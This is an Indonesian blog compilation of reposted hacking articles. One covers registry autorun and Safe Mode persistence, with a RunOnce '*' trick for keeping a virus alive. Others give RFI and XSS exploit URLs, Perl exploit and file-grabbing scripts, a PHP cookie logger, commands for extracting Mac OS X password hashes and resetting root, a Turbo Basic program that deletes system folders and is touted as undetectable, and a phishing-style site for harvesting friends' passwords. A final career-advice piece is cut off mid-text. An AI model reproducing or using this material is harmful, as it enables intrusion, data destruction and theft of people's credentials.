3
Melacak Jejak Virus di Registry

.
Virus dan Safe Mode

Windows biasanya akan diperlengkapi dengan modus safe mode. Dimaksudkan agar pemakai dapat memperbaiki Windows jika terjadi suatu musibah. Windows safe mode sebetulnya tidak lebih dari Windows yang dijalankan dengan driver standar! Sehingga jika terjadi kerewelan pada driverdriver non-standar Windows yang membuat Windows modus standar gagal dijalankan, maka Windows modus standar dapat dipulihkan lagi dengan cara masuk ke modus safe mode. Pada saat dalam modus safe mode inilah, pemakai
berkesempatan untuk melakukan eliminasi pada drive non-standar yang bermasalah
tersebut. Dengan cara ini, Windows yang rusak akan menjadi normal kembali.

Melihat fungsinya, tentu saja, modus safe mode ini, juga merupakan ancaman
bagi kelangsungan hidup virus atau program-program yang suka membuat
masalah. Oleh karena itu, modus safe mode ini juga merupakan target
utama program virus. Artinya, virus akan berusaha memanipulasi modus safe
mode atau bahkan menggagalkan fungsinya!

Bagaimana masuk ke modus safe mode?

Lakukan booting ulang komputer. Pada saat proses booting dimulai, tekanlah tombol F8 secara cepat dan berulangkali. Sehingga muncul menu boot Windows. Pilihlah Safe Mode, maka proses akan berjalan hingga akhirnya menampilkan pilihan user yang harus digunakan untuk masuk ke Windows safe mode. Pada Windows XP, biasanya akan muncul account Administrator dan account yang kita punya. Pilihlah user Account yang biasa
kita pakai. Setelah itu biasanya kita akan ditanya, apakah akan masuk ke modus Safe mode ataukah kita akan memakai fasilitas system restore Windows. Klik Yes, maka
kita akan masuk ke mode Windows safe mode. Artinya, Windows akan aktif dengan perangkat apa adanya (standar minimalnya).

1 Aktif dalam Safe Mode
Ada subkey registry Windows yang berguna untuk menjalankan suatu program secara otomatis saat Windows dihidupkan. Jadi, jika kita ingin agar suatu file executable aktif saat Windows dihidupkan, maka kita harus menulisi subkey autorun ini dengan suatu nama value yang berisi data yang menyebutkan bahwa file X.EXE adalah file yang harus dieksekusi. X di sini mewakili sembarang nama file EXE.

Tools standar milik Windows untuk memeriksa konfigurasi autorun adalah program System Configuration Utility atau lebih dikenal dengan nama msconfig karena file pengaktif program tersebut bernama msconfig.exe. Untuk memanggilnya, dilakukan via perintah Run dari menu Start. Klik Start - pilih Run dan ketikkan msconfig. Tekan Enter atau klik OK.

Jendela System Configuration Utility akan muncul dan terlihat beberapa tab. Salah satunya tab Startup. Tab tersebut berguna untuk melihat program apa saja yang akan dijalankan oleh Windows pada saat Windows diaktifkan. Virus biasanya akan memblokir penggunaan program ini. Entah itu dengan mematikan pilihan Run atau memonitor caption (judul/nama) jendela program yang sedang aktif. Jika caption program yang sedang aktif adalah sama dengan caption yang telah ditargetkan oleh virus, secara otomatis virus akan segera menutupnya atau mungkin melakukan booting ulang.

Mengapa saat suatu virus aktif, dan kita memanggil msconfig, tiba-tiba jendela program msconfig menutup dengan sendirinya. Atau mungkin, tiba-tiba, komputer melakukan booting ulang…???
Pada tab Startup, akan terlihat kolom Startup item, yang menunjukkan nama item yang akan dijalankan saat Windows diaktifkan. Juga kolom command, yang biasanya berisi program yang diaktifkan plus parameternya jika ada. Sedangkan kolom Location, menunjukkan lokasi subkey (syaraf) registry yang menyimpan setting data ini. Pada contoh terlihat, nama SMTray ternyata adalah milik program yang bernama SMTray.exe dan berada di folder d:\Program Files\Analog Devices\SoundMAX.

Virus biasanya akan membuat suatu nilai di sini, agar file yang memicu pengaktif
programnya dijalankan saat booting Windows terjadi sehingga penelitian di bagian ini amat penting untuk dilakukan. Celakanya lagi, virus-virus sekarang memasangkan nama itemnya dengan nama yang “berbau-bau” nama file sistem Windows. Hal ini untuk mengelabui pemakai yang memeriksanya. Misalnya, dengan nama windows.exe, svc0host.exe, rundlll.exe dan lain sebagainya.

Jika kita sudah menemukan item yang kita curigai, hilangkan tanda centang yang ada di depan startup item. Jika tidak dicentang, artinya item tersebut tidak akan dijalankan saat booting dilakukan. Sebaliknya, jika dicentang, maka akan dijalankan. Setelah kita melakukan proses centang atau un-centang. klik OK dan lakukan booting ulang agar proses pengubahan menjadi aktif. Tools standar milik Windows lainnya yang dapat dipakai untuk memeriksa konfigurasi autorun registry adalah program Registry Editor. Untuk memanggilnya, dilakukan via perintah Run dari menu Start. Klik Start - pilih Run dan ketikkan regedit. Tekan Enter atau klik OK.
Program registry editor akan tampil. Pergilah ke lokasi:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Run Klik ganda berulangkali pada subkey yang terlihat sehingga lokasi tersebut

Pada subkey Run inilah biasanya virus akan menuliskan nama value baru untuk
mengaktifkan program virus. Untuk menghapus data yang ada, klik nama value dan tekan DEL.

Lokasi-lokasi lain yang perlu kita periksa dalam rangka autorun registry ini
adalah:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Once
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
OnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Jika ditemukan nama value yang menurut Anda aneh, hapus saja. Dari beberapa subkey di atas, ada satu subkey yang cukup istimewa. Yaitu subkey RunOnce. Berbeda dengan subkey Run yang akan selalu menjalankan program yang ada di dalamnya setiap kali Windows dihidupkan, subkey RunOnce ini biasanya dipakai untuk menjalankan satu program sebanyak satu kali saja! Jadi, subkey ini biasanya dipakai oleh suatu program untuk mengaktifkan prosesnya sebanyak satu kali saja sehingga nama value yang dituliskan di sini hanya akan berlaku satu kali saja. Setelah dijalankan, nama value tersebut akan dihapus.

Jika pembuat virus cukup nakal, ia akan membuat program virus untuk menuliskan
pengaktifnya di subkey ini. Jadi, virus akan aktif saat komputer dihidupkan.
Program akan dijalankan dan nama value pemicu akan dihapus. Maka ia tidak meninggalkan jejak di msconfig. Selang beberapa waktu saat virus aktif, ia akan membuat program timer yang secara berkala menulis ulang nama value di subkey tersebut. Atau mungkin virus hanya akan menuliskan data pada subkey RunOnce saat komputer akan di-log off. Dengan cara tersebut, virus akan terjaga eksistensinya. Lumayan cerdik ‘khan?
Tapi…. ada yang lebih gila lagi…☺ dengan bantuan subkey RunOnce ini, virus akan tetap dapat hidup biarpun Windows dijalankan di modus SAFE MODE!
Caranya? Sederhana saja! Yaitu dengan menambahkan satu karakter tertentu pada nama value tersebut, maka virus akan dapat berjalan pada safe mode.
Karakter apakah itu? Saya tidak akan memberi tahu Sampeyan..
ndak ding… nanti saya dipikir tukang menyembunyikan ilmu lagi.
Kita langsung praktek saja ya? Panggil Regedit dan pergi ke subkey:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Once
Kita buat suatu nama value yang bernama COBA. Nama value ini misalnya
akan memanggil file virus yang bernama VIRUSKU.EXE.

Klik kanan subkey Runonce. Menu konteks akan muncul, pilih New, pilih
String Value.

Suatu subkey baru akan muncul. Kita ganti nama value tersebut dengan data
COBA. Ketik COBA dan tekan Enter.

Klik ganda nama value tersebut dan kita isi datanya dengan
c:\windows\virusku.exe. Lalu klik OK

Jika benar dalam melakukannya, kita akan memiliki nama value COBA dengan jenis string dan mempunyai data c:\windows\virusku.exe. Artinya, saat nanti Windows dihidupkan, file VIRUSKU.EXE akan ikut dijalankan!

Nah! Sekarang, bagaimana caranya agar nama value tersebut tetap akan dijalankan biarpun Windows dimasukkan dalam modus SAFE MODE?
Gampang! Cukup tambahkan karakter * (asterisks) di depan nama value tersebut.
Artinya, nama COBA kita ganti dengan nama *COBA.

#Jika tidak percaya, lakukan booting dan masuklah dalam modus SAFE MODE. Saharusnya file dengan nama VIRUSKU.EXE akan tetap dijalankan oleh Windows. Jika yang kita pasangkan file tersebut adalah file virus beneran, maka akibatnya akan cukup fatal. Virus tetap akan hadir di memory biarpun kita telah memakai modus SAFE MODE. Biarpun trik ini kelihatannya sederhana, tapi cukup berbahaya jika dipakai. Karena sesudah data tersebut dijalankan, maka data yang dijalankan tersebut akan dihapus oleh Windows. Sehingga akan mempersulit pelacakan sumber masalahnya. Take care…!

#Jika virus tetap saja aktif biarpun kita sudah masuk ke modus safe mode, periksalah subkey RunOnce secara berulang kali. Siapa tahu virus tidak memakai teknik shell
spawn, tapi mengandalkan subkey Runonce. Teknik Runonce ini, masih jarang dilakukan oleh virus. Jadi, hukumnya wajib dipasangkan! Semakin banyak manipulasi yang dapat membuat virus aktif, maka akan semakin sukses virus tersebut bertahan hidup.

2 Alternate Shell Safe Mode
Virus biasanya tidak akan dapat aktif bila kita masuk ke safe mode. Itu biasanya!
Pada perkembangannya, virus ternyata juga sudah mulai melebarkan sayapnya, mencekal (cegah dan tangkal.. ☺) beberapa penanganan safe mode dengan memasangkan pemicu filenya pada beberapa subkey registry. Dengan cara ini, virus akan tetap dijalankan dan mencegah pemakai untuk masuk ke modus SAFE mode!

Jadi, trik ini akan menggenapi trik pertama tadi… ☺ menambah ruwetnya
pematian virus. Hehehe… ndak pa pa malahan tambah asyik khan?
Lokasi subkey registry yang diserang adalah:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot

Pada subkey SafeBoot ini akan terdapat suatu nama value yang bernama AlternateShell. Dengan jenis datanya adalah string. Kita lihat isian standarnya adalah CMD.EXE. Jika tidak berisi data tersebut, ada kemungkinan file yang ada di situ adalah file virus. Waspadalah! Misalkan hal itu terjadi, klik ganda nama value tersebut dan pada isian Value data ubahlah menjadi berisi CMD.EXE. Klik OK.

Yang perlu mendapat perhatian! Virus umumnya juga akan menyerang subkeysubkey
yang sejenis. Artinya begini… virus juga akan menyerang lokasi registry lain yang menyimpan data-data SafeBoot, biasanya memang terdapat lebih dari satu kontrol ini. Lokasi lain yang diserang adalah:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Control\SafeBoot
Jadi, bergantung pada komputer tersebut mempunyai berapa subkey
ControlSet00X. X di sini mewakili angka 1, 2, dan seterusnya. Dengan diubahnya data pada nama value AlternateShell, maka biasanya komputer akan gagal masuk ke SAFE MODE, malahan menjalankan file virus!

Jika virus menyerang dan kita gagal masuk ke modus safe mode, maka subkey-subkey alternate shell ini wajib kita periksa. Jika isi datanya aneh, tidak standar, maka ubahlah isiannya dengan CMD.EXE.

Biarpun manipulasi ini terkesan kasar dan kejam, namun apa boleh buat, pencegatan masuk ke safe mode ini, wajib dilakukan. Karena akan membuat virus lebih aman dan
terjaga eksistensinya!


Bookmark and Share




1
WebXploit Framework

.
Semakin maraknya aksi hacking menggunakan web/http yang lebih dikenal dengan istilah web-hacking membuat "w[x]f project" ini layak untuk digarap serius.

Sebenarnya ide ini sudah lama terlintas saat penulis mulai belajar mencari bugs/holes/vulnerabilities aplikasi web (khususnya CMS) dan dengan beberapa jenis attack yang terdata (WATSC) ataupun tak terdata maka terdapat pola untuk "metode penyerangan" dan "exploitasi" terhadap aplikasi-aplikasi itu berbeda.

Perhatikan beberapa advisories berikut ini:

---| I. PHP remote file inclusion


1. Remote Command Execution vulnerability in BBS E-Market Professional
[http://echo.or.id/adv/adv06-y3dips-2004.txt]

Vulnerabilities:
~~~~~~~~~~~~~~~~

Remote command execution on becommunity (modules that support by
BBSemarket professional) makes insecure calls to the include() function
of PHP (works on " pageurl= " functions) which can allow the inclusion
of remote files, and thereby the execution of arbitrary commands by
remote user with the web server user permissions, usually 'nobody' .

Exploit:
~~~~~~~~
http://[URL]/becommunity/community/index.php?pageurl=[evil file]


2. SocialMPN Remote File Inclusion
[http://waraxe.us/ftopic-542-0-days0-orderasc-.html]

# SocialMPN Remote File Inclusion
# 06/03/2005
# discovered by zer0-c00l (irc.BRASnet.org at #NMAP)
# or email (lucaszero [at] gmail [dot] com)
# Versions of SocialMPN affected: All versions.
# SocialMPN oficial site: www.socialmpn.com (Its vulnerable too)
# PS.: A lot of sites (maybe all sites) has SafeMode in PHP.

Exploit:
~~~~~~~~
http://[URL]/modules.php?name=[evil file]&file=article&sid=2


Untuk melakukan proses eksploitasi, kita dapat menggunakan script berikut..

<++> echo11-008/becommunity-exp.pl
#!/usr/bin/perl -w

require LWP::UserAgent;

if(@ARGV == 1)
{

$target= $ARGV[0];//http://[victim]/becommunity/community/index.php?pageurl=
$xploit= $ARGV[1];//http://[attacker]/cmd.txt

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target=$exploit";
my $injek = $ua->get($url);

print " -------------------------------\n";
if ($injek->is_success)
{ print $injek->content;}
else
{die $injek->status_line;}
print " -------------------------------\n";
}

else
{ print "Use: perl $0 [target] \n"; }
<--> echo11-008/becommunity.pl


---| II. XSS (Cross site Scripting)


1. XSS on endonesia CMS

Exploit:
~~~~~~~~
http://[URL]/endon/mod.php?mod=publisher&op=search&query=%3Cscript%
\3Ealert(document.cookie)%3C/script%3E


2. XSS on Exponent CMS

Exploit:
~~~~~~~~
http://[URL]/expo/index.php?action=createuser&module=%3Cscript%3Ealert
\(document.cookie)%3C/script%3E


perhatikan kesamaan diantara dua metode eksplotasi diatas sehingga bisa kita
membuat formula seperti..

http://[URL]/[Vuln Path]=[XSS]

dan mengubah command dari

<++> echo11-008/ambilkue.php
$fp = fopen('catet.txt','a');
fputs($fp, $_GET['kue']."[stop]");
fclose($fp);
?>
<--> echo11-008/ambilkue.php

Selanjutnya tinggal menampilkan hasil dari file "catet.txt".


---| III. Information disclosure


1. Information Dislosure in SphpBlog
[http://echo.or.id/adv/adv12-y3dips-2005.txt]

Exploit:
~~~~~~~~
http://[Url]/sphpblog/config/password.txt
http://[Url]/sphpblog/config/config.txt

<< formula >>

http://[URL]/[Path]/[file]

Saya telah membuatkan script sederhana untuk grabbing isi file

<++> echo11-008/sphpblog-exp.pl
#!/usr/bin/perl -w

print "\n*Remote grabbing sphpblog password&config file by y3dips*\n";
require LWP::UserAgent;

if(@ARGV == 1)
{

$target= $ARGV[0];

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

my @url = ("http://$target/config/password.txt",
\"http://$target/config/config.txt");

foreach my $urlz (@url) {
my $injek = $ua->get($urlz);
print "\n-------------------------------\n";
if ($injek->is_success)
{ print $injek->content;}
else
{die $injek->status_line;}
print "\n-------------------------------\n";

}
}
else {
print "Use: perl $0 [www.target.com] \n";
}

# EOF y3dips(c)2005
<--> echo11-008/sphpblog-exp.pl


---| IV. etc..

Masih banyak lagi jenis web vulnerabilites yang memiliki kesamaan dalam
metode pengexploitasiannya. Untuk info mengenai jenis vulnerabilities
web bisa melihat artikel yang dikeluarkan oleh www.webappsec.org

>>title : Web Application Security Consortium Threat Clasification
>>url : http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.txt


------| Core System


Untuk tahap awal, w[x]f masih bersifat pasif -- hanya mengumpulkan informasi
terhadap aplikasi web beserta exploitnya, dan pada pengembangan lanjut,
w[x]f diharapkan dapat digunakan sebagai pentest//web assessment tool.

Adapun beberapa hal yang menjadi acuan :

0. Dibuat dengan bahasa pemrograman PERL (bisa di kembangkan dengan C)
1. Pengggunaan module LWP untuk menggantikan metode penggunaan socket
2. Penggunaan module untuk mempermudah manajemen penambahan exploit
3. Metasploit framework[3] untuk aplikasi contoh struktur dan interface
4. HTTrack untuk metode grabbing keseluruhan situs (pengembangan)
5. WIKTO untuk metode scanning dan google-hack (pengembangan)

simple Map


|(Use)
+-> - php injection ---+
- Xss |(choose)
- info Disc +-> - becommunity --+
- SQl injection - SocialMPN |(exploit)
- path traversal +-->Set Target URL
- [etc] Set Exploit URL
Set command*


Source: http://echo.or.id

Bookmark and Share



3
Crack Admin Password (Mac OS x)

.
Untuk meng-crackpassword langkah pertama adalah mendapatkan hash. Run terminal and type:

G4x:~ noadmin$ nidump passwd .
-- anda akan melihat admin username diikuti tanda : ********
ex: root:********:0:0::0:0:System Administrator:/var/root:/bin/sh
admin:********:503:503::0:0:agd:/Users/admin:/bin/bash
agd:********:503:503::0:0:agd:/Users/agd:/bin/bash

G4x:~ noadmin$ niutil -read . /users/admin --> untuk membaca profil dari admin dan akan
-- dihasilkan generateduid : F8EE9D97-4E66-11D9-AFFE-000A95C81955 --> make note about this

misalkan untuk melihat profil dari user agd:
G4x:~ noadmin$ niutil -read . /users/agd
name: agd
_writers_passwd: agd
_writers_tim_password: agd
_writers_picture: agd
shell: /bin/bash
_writers_hint: agd
home: /Users/agd
gid: 503
authentication_authority: ;ShadowHash;
_writers_realname: agd
picture: /Library/User Pictures/Animals/Dog.tif
passwd: ********
realname: agd
hint:
sharedDir: Public
_shadow_passwd:
uid: 503
generateduid: F8EE9D97-4E66-11D9-AFFE-000A95C81944
---------------------------------------------------

kemudian untuk meng-generate kedalam file text lakukan perintah berikut:

--------------------------------------------------
G4x:~ noadmin$ nireport / /users agd generateduid > crck.txt

reboot, masuk melalui single-user mode (hold Cmd+S). dan ketikan perintah ini:

mount -uaw
cp -R /var/db/shadow/hash /Users/hash
chmod -Rf 777 /Users/hash
reboot

perintah diatas untuk memindahkan file hash ke directory /Users/hash.
Setelah mendapatkan hash, download john the ripper di http://www.openwall.com/john/

Cara untuk menggunakan JTR tidak akan dibahas disini karena sudah banyak sekali
tutorial-tutorial yang bertebaran di inet tentang JTR ini.

-------------------------------------------------------------------------------------
Jika anda tetap tidak mendapatkan akses untuk melakukan perintah2 diatas, maka anda dapat sama sekali menghapus file database netinfo dan menggantinya dengan yang baru sehingga yang dapat masuk kedalam komputer hanya user yg anda ciptakan.
-------------------------------------------------------------------------------------
hanya dengan melakukan perintah ini:
-------------------------------------------------------------------------------------
reboot ke single user mode, secara default anda akan mempunyai akses root.

localhost:/ root# /sbin/mount -uw /
localhost:/ root# cd /var/db/netinfo
localhost:/var/db/netinfo root# mv local.nidb local.nidb.old --->tujuannya untuk menonaktifkan netinfo sebelumnya, dan mengganti dg yg baru
localhost:/var/db/netinfo root# /usr/libexec/create_nidb --->netinfo baru!
localhost:/var/db/netinfo root# nicl -raw local.nidb -create /users/root passwd "" -->enable root
sehingga anda bisa mengakses komputer dalam mode gui dengan account root (password blank) dan membuat
account baru (admin) sesuka anda

localhost:/var/db/netinfo root# exit
-------------------------------------------------------------------------------------
atau jika anda tidak ingin mereset keseluruhan database netinfo gunakan perintah ini pada single-user:
-------------------------------------------------------------------------------------
localhost:/ root# /sbin/fsck -y
localhost:/ root# /sbin/mount -wu
localhost:/ root# /sbin/SystemStarter
localhost:/ root# niuitil -appendprop / /groups/admin users USER
localhost:/ root# sudo reboot

Source: Echo.or.id

Bookmark and Share


1
Cara membuat program perusak (Seperti Virus)

.
Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.

Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google atau cari dirental CD.

Jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.

shell "Perintah DOS"

dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda
membuat :

shell "c:"
shell "cd\"
shell "del command.com"

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.

shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"

Diatas adalah contoh menghapus Directory My Document, Windows dan Program Files, sangat fatal bukan ?

Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.

Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa BELUM ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows.

Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.

Source: www.yogyafree.tk

Bookmark and Share


2
Trik Mendapatkan Password email dengan PHP+MySQL

.
Yang Perlu Di Persiapkan
------------------------
Seperti ada yang harus disiapin :
1. Komputer
2. Akses Internet (kalo mau di upload)
3. PHP Triad (kalo belum ada download di sourceforge.net)


Langkah pertama :
* kita membuat sebuah komunitas, karena dengan komunitas akan banyak orang
(terutama yang kita kenal) akan mendaftar ke website kita, dengan adanya fasilitas
chatroom, forum diskusi, shoutbox, dll. contoh komunitas alumni sekolah....

Langkah Kedua :
* Membuat Website secara sederhana (kalo nggak bisa yang canggih) tentang website alumni sekolah tersebut, rancanglah sedemikian rupa, sehingga orang laen akan tertarik akan mengisi formulir yang kita sediakan. buat web tersebut terserah mau pake program apa (Ms.Frontpage, Macromedia Dreamviewer, ato bahkan pake notepad).

Langkah Ketiga :
* Bukalah Program Apache yang telah di Install dari PHP Triad di Start->Program->PHPTriad->Apache Console->Start Apache, dan aktifkan Database MySQL di Start->Program->PHPTriad->MySQL->MySQL-D
* Copy Paste lah web anda ke C:\APACHE\HTDOCS misal nama folder anda echo, maka bukalah Browser anda lalu ketik http://Localhost/echo maka akan tampil web yang anda buat
* Buatlah database baru dengan nama echo dengan cara ketik di browser anda
http://localhost/phpMyAdmin atau http://localhost/phpmyadmin (kalo di linux case sensitif create lah database yang akan anda buat misal echo
* Editlah web anda menggunakan editor web (Fronpage, Dreamviewer, Notepad) JANGAN LUPA HALAMAN DEPAN WEBSITE ANDA ADALAH INDEX.PHP agar web anda langsung terbaca pertama kali oleh server apache
* buatlah file config.php dengan script
--------------------------------------

//file config.php

$HOST="localhost"; //NAMA HOST
$USER_NAME="root"; //USERNAME UNTUK DATABASE
$PASSWORD=""; //PASSWORD DATABASE
$DATABASE="echo"; //database yang digunakan

?>
---------------------------------------
ingatlah untuk username dan password serta database seusaikan dengan hosting yang anda buat untuk saat ini kita hanya mencoba di akses local (localhost).
File config.php ini berguna untuk konfigurasi seluruh file web yang menggunakan database dan tinggal masukkan file config.php tsb tanpa menulis satu persatu tiap halaman web.

Lalu masukkan script ini kedalam file index.php

-------------------------------------------------


if(isset($user)){
echo "kamu login sebagai $user
logout

";
}else{
echo "Kamu belum login ! Register";
}
?>














----------------------------------------------------
terserah mau masukin dimana, asalkan sesuai dengan web anda.

Buatlah File Register dengan nama file form.php masukkan listing berikut kedalam tag

-----------------------------------------------------
User ID :
Password :
 







[PENDAFTARAN USER]
Di sini yang mendaftar
adalah semua alumni SMU Negeri 3 Palembang.






















































User ID :  
Password :  
Email :  
Nama lengkap :  
Status :  
Alamat :  
Kode Pos :  
Kota :  
Negara :  
Telepon :  
Jenis Kelamin :  
Tanggal Lahir :  Tanggal :
Bulan : Tahun :
 

 

 





-------------------------------------------------------
ini script berantakan dan saya ambil dari website sekolah tetangga
silahkan langsung di copy paste...

lalu buat juga file login1.php untuk proses saat login

------------------------------------------------------
include "config.php";
mysql_connect($HOST,$USER_NAME,$PASSWORD);
$cari=mysql_db_query($DATABASE,"
select userid, password from echo_user
");
$log=0;
while($a=mysql_fetch_row($cari)){
if($a[0]==$id && $a[1]==$psw){
$log=1;
break;
}else{
$log=0;
}
}
if($log){
setcookie("user","$id",time()+10000);
if($op=="daftar"){
header("location:index.php");
}
}
?>

---------------------------------------------------------

buat juga file logout.php

--------------------------
setcookie("user");
header("location:index.php");
?>
---------------------------

lalu buatlah file install.php (aku kebiasaan install dan uninstall program,
jadi aku memakai istilah ini.

----------------------------

include "config.php";
mysql_connect($HOST,$USER_NAME,$PASSWORD);

$echo_user=mysql_db_query($DATABASE,"
create table echo_user (
userid varchar(100) primary key,
password varchar(100),
email varchar(100),
nama varchar(100),
status varchar(10),
alamat text,
kodepos varchar(10),
kota varchar(100),
negara varchar(100),
telepon varchar(20),
sex varchar(15),
lahir varchar(100)
)");
if($SMANTAweb_user){
echo "tabel echo_user berhasil dibuat
";
}else{
echo "tabel echo_user gagal dibuat
";
}

?>

---------------------------------------------------

INGAT TIDAK SEMUA FILE WEB PHP DIAWALI DENGAN ....
IKUTI PETUNJUK YANG ADA....

akhirnya selesai skripnya, lumayan panjang, tetapi nggak papalah namanya juga usaha


Langkah Keempat :
* Installah segala skrip database yang anda buat dengan cara ketik
http://localhost/echo/install.php

maka akan ada pesan "tabel echo_user berhasil dibuat" dan bila ada pesan "tabel echo_user gagal dibuat" coba periksa lagi skrip siapa tahu ada yang salah ketik.

Bila sudah silahkan buat aplikasi yang laen seperti forum diskusi, pesan singkat (Shoutbox)Chatting, Gallery Photo (Tentu dengan mengerti PHP -->beli bukunya dong...

Langkah Kelima :
* Untuk pengetesan silahkan isi formulir dengan klik register
kalau berhasil silahkan lihat passwordnya di database MySQL di http://localhost/phpMyAdmin klik echo, lalu klik browse di echo_user, lalu silahkan lihat passwordnya user anda dengan klik user tersebut.

Langkah Keenam :
* Upload file web anda ke hosting yang gratisan seperti di www.tripod.com, www.freeserverhost.com (bayar lebih bagus kalo ada duit hehe.)

Lalu Undanglah teman-teman anda lewat mailing list atau email agar segera mengunjungi website yang anda buat.

Langkah Keenam :
* Silahkan nikmati hasilnya di database yang anda buat (bagi seseorang mengetahui hal yang
sangat pribadi orang laen sangat nikmat, dan bangga sekali).

NB: Ini sama aja membuat Web Forum Community

Source: www.ilmukomputer.com

Bookmark and Share


1
Network Security (hacking) : Fun or Profit

.
Langkah Pertama : Belajar apapun yang kamu bisa pelajari.

1. Mungkin kamu mau untuk memulai dari pandangan umum mengenai sekuritas, seperti
buku "Practical Unix and Internet Security 3rd Edition" atau baca beberapa artikel
di www.SecurityDocs.com.

2. Membaca sendirian tidak akan banyak membantu, untuk menjadi pakar harus menjadi
kritis. sangat dianjurkan anda melakukan eksperimen ringan dengan menggunakan
beberapa PC (Unix, Linux atau Windows), kalo anda bertanya mengapa harus ada
windows, karena Unix, Linux ataupun Windows adalah sesuatu yang sangat nyata
di dunia yang sebenarnya. kamu dapat menggunakan PC lama yang sudah usang atau
menggunakan program emulator untuk melakukan simulasi network yang besar dengan
menggunakan aplikasi seperti "VMWare".

3. Berikut yang harus kamu pelajari adalah bagaimana serangan dilakukan. cobalah
untuk melihat atau membaca "the excellent and free Open Source Security Testing
Methodology Manual (OSSTMM)". tujuan dokumen ini menyediakan ruang kerja yang
komplit untuk sekuritas testing. tapi kebanyakan yang dibahas adalah langkah
yang harus dilakukan tanpa memberikan penjelasan yang mendetail bagaimana cara
melakukannya. kamu akan dapat belajar banyak melalui manual ini bila kamu
benar-benar melakukan penelitian langkah apa saja yang tidak kamu pahami.
dan bila kamu berusaha untuk mengimplementasikannya kedalam network dan
ternyata terlalu susah, maka kamu dapat membaca buku yang lebih "bersahabat"
dalam melakukan penjelasan seperti "Hacking Exposed 4th Edition"

4. Sekarang kamu mungkin sudah mengerti beberapa dari ide-ide sekuriti yang umum,
ada beberapa area yang menjadi sangat mudah belakangan ini. Cara berpikir yang
digunakan pada informasi celah keamanan hanya dapat di sebarkan kepada orang-orang
yang dikenal baik atau administrator yang dapat dipercaya bisa juga peneliti celah
keamanan melalui brainstorming privat. ini akan menjadi sebuah bencana untu beberapa
alasan, dan pergerakan "Full Disclosure" telah lahir. dalam beberapa tahun belakangan,
semuanya mulai bergerak kedepan secara penemuan terbatas ("bertanggung jawab") dan
ada juga beberapa trend mengenai "pay-money-for-early-disclosure". tapi informasi
masih sangat banyak daripada yang dibutuhkan. banyak berita tersebut hanya di
posting didalam milis (mailing-list). kamu dapat mempertimbangkan untuk ikut dalam
milis seperti Bugtraq. saya juga menyarankan anda agar mempelajari Pen-Test,
Vuln-Dev dan Sekuritas Dasar. bacalah dokumen sekitar 6-12 bulang yang lalu yang
biasanya telah di "archive", bacalah dibidang yang memang kamu ingin berkutat
atau membuat kamu tertarik. SecurityFocus biasanya menawarkan daftar lowongan
kerja yang mungkin dapat membuat kamu untuk tertarik.

Ada 2 hal utama mengapa anda membaca Bugtraq. yang pertama karena anda harus
dapat bereaksi dengan cepat begitu celah keamanan baru telah ditemukan dan
anda harus segera melakukan patching terhadap system, memberitahukan kepada
client anda atau teman dan keluarga dan mungkin juga kolega anda. anda akan
dengan mudah dapat melakukan pengecekan terhadap "subject lines" atau hasil
"advisories" untuk "bug" yang terjadi pada system anda. Sebenarnya, memahami
sebuah celah keamanan akan dapat membantu anda untuk bertahan dari serangan
yang terjadi, melakukan serangan sendiri dan juga mengidentifikasi atau
mencegah "bug" serupa yang akan terjadi di masa yang akan datang. bila kamu
cukup beruntung, advisories kadang kala disertai dengan penjelasan detil
mengenai "bug" yang ada. cobalah untuk membaca beberapa advisories dari
CORE Security Technologies. perhatikan bagaimana mereka menjelaskan secara
terperinci tentang bagaimana celah keamanan terjadi pada "Snort TCP Stream Reassembly"
dan bahkan memberikan sebuah demonstrasi "Proof-of-Concept" (pembuktian dari teori).

sayangnya, tidak semua advisories muncul pada saat yang "tepat". Untuk masalah dalam
